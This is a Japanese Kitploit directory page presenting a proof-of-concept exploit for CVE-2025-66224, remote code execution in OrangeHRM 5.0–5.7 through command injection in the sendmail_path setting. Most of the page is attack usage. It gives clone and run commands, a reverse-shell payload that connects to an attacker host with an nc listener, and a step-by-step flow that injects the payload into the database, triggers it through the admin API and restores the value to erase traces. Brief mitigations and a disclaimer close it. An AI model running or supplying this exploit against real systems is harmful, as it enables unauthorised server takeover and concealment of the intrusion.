Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/richard-natan/poc-cve-2025-66224
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育データベースセキュリティ
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

概念実証エクスプロイト (CVE-2025-66224) — OrangeHRM の sendmail_path パラメータにおけるコマンドインジェクションを介したリモートコード実行を示すもの。自動的なデータベースペイロードインジェクションとクリーンアップを伴う。

リポジトリを見る
238ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OrangeHRM RCE Exploit - CVE-2025-66224

📋 説明

この概念実証(PoC)は、OrangeHRM の sendmail_path 設定パラメータにおけるコマンドインジェクションを通じたリモートコード実行(RCE)脆弱性を示しています。

このエクスプロイトは以下のように動作します:

  1. 悪意のあるペイロードを MySQL データベース(hs_hr_config テーブル)に注入する
  2. メール設定 API エンドポイントを介してペイロードの実行をトリガーする
  3. 元の値を自動的に復元して痕跡を消去する

🎯 影響を受けるバージョン

  • OrangeHRM バージョン 5.0 から 5.7

⚠️ 免責事項

このツールは教育目的および許可されたセキュリティテスト目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。作成者はこのツールの誤用または損害について一切の責任を負いません。

🔧 必要条件

root@kitploit:~
pip install requests mysql-connector-python

📦 インストール

root@kitploit:~
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 使用法

ステップ 1: セッション Cookie を取得する

  1. Web インターフェースから OrangeHRM にログインする
  2. ブラウザの開発者ツール(F12)を開く
  3. ストレージ > Cookie(Firefox)またはアプリケーション > Cookie(Chrome)に移動する
  4. _orangehrm Cookie の値をコピーする

ステップ 2: エクスプロイトを実行する

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \
    -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \
    -cmd '<COMMAND_TO_EXECUTE>'

例 - 単純なコマンド

root@kitploit:~
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

例 - リバースシェル

root@kitploit:~
# 攻撃マシンでリスナーを起動する
nc -lvnp 4444

# リバースシェルペイロードでエクスプロイトを実行する
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 パラメータ

パラメータ短縮形必須説明
--target-t✅ターゲットURL(例:http://target.com)
--cookie-c✅セッションCookieの値
--cookie_name-cn❌Cookie名(デフォルト:_orangehrm)
--command-cmd✅ターゲット上で実行するコマンド
--db_host-dh✅MySQLホストアドレス
--db_user-du✅MySQLユーザー名
--db_pass-dp✅MySQLパスワード
--db_port-dport❌MySQLポート(デフォルト:3306)

🔍 動作の仕組み

脆弱性の詳細

脆弱性は、sendmail_path パラメータがデータベースに保存され、適切なサニタイズなしで後で実行されるメール設定機能に存在します。

エクスプロイトの流れ:

root@kitploit:~
1. OrangeHRM に認証する(有効なセッションCookieを取得)
   ↓
2. MySQL データベースに接続する
   ↓
3. hs_hr_config テーブルを見つける
   ↓
4. email_config.sendmail_path の値を更新する:
   FROM: /usr/sbin/sendmail -bs
   TO:   /usr/sbin/sendmail -bs && <PAYLOAD> #
   ↓
5. API 経由で実行をトリガーする:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. コマンドがサーバー上で実行される
   ↓
7. 元の値を復元する(クリーンアップ)

技術的詳細

脆弱性のあるパラメータ: email_config.sendmail_path

データベース:

  • テーブル:hs_hr_config
  • カラム:name = 'email_config.sendmail_path'
  • カラム:value = sendmail コマンドのパス

トリガーエンドポイント:

root@kitploit:~
PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 緩和策

  1. 入力検証: sendmail_path パラメータに厳格な検証を実装する
  2. エスケープ: 実行前にシェルコマンドを適切にエスケープする
  3. 最小権限: Webサーバーを最小限の権限で実行する
  4. 更新: OrangeHRM の最新のセキュリティパッチを適用する

🤝 クレジット

PoC 作成者: RiccK

チーム: Bypassadores && HackersOnSteroids

🔗 参考文献

  • CVE-2025-66224

⚠️ 責任を持って使用してください。テストを実施する前には必ず適切な許可を取得してください。

ツールをダウンロード